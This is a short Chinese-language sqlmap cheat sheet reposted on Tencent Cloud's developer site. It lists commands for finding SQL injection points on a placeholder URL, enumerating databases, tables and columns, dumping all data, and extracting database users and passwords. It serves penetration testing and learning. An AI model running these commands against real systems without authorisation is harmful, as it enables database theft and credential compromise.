sqlmap
GitHub:https://github.com/sqlmapproject/sqlmap
基础命令:
# 扫描id是否存在注入点
sqlmap -u https://aaa.com/?id=1
# 添加cookie
sqlmap -u https://aaa.com/?id=1 --cookie="cookie"
# post传参
sqlmap -u https://aaa.com/?id=1 --data="name=admin&password=123456"
# 用请求包进行注入,http.txt是抓取的请求包
sqlmap -r http.txt 数据库:
# 查看所有数据库
sqlmap -u https://aaa.com/?id=1 --dbs
# 查看当前数据库
sqlmap -u https://aaa.com/?id=1 --current-db数据表:
# 爆表(已知数据库)
sqlmap -u https://aaa.com/?id=1 -D database_name --tables
# 爆列(已知数据库,表名)
sqlmap -u https://aaa.com/?id=1 -D database_name -T table_name --columns
# 爆列数据(已知数据库,表名,列名)
sqlmap -u https://aaa.com/?id=1 -D database_name -T table_name -C column_name --dump
# 爆出(数据库/表/....)所有数据
sqlmap -u https://aaa.com/?id=1 --dump-all
sqlmap -u https://aaa.com/?id=1 -D database_name --dump-all用户:
# 查看所有用户
sqlmap -u https://aaa.com/?id=1 --users
# 查看所有用户密码
sqlmap -u https://aaa.com/?id=1 --passwords
# 查看当前用户
sqlmap -u https://aaa.com/?id=1 --current-user
# 查看当前用户是否有管理员权限
sqlmap -u https://aaa.com/?id=1 --is-dba
# 列出所有管理员
sqlmap -u https://aaa.com/?id=1 --roles其他参数:
# 设置注入点
-p
# 已知id参数存在漏洞
-p id
# 设置从哪开始
--start
# 从第2条数据开始
--start 2
# 设置从哪结束
--stop
# 到第50条数据结束
--stop 50
# 设置数据库
--dbms
# 设置数据库为mysql
--dbms="MySQL"
# 设置探测等级(1-5),当level=2时,会测试cookie注入,当level=3时,会测试user-agent/referer注入
--level
# 设置探测等级为3
--level=3
# 设置危险等级(1-3)
--risk
# 设置危险等级为2
--risk=2本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023 年 02 月,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
腾讯云开发者
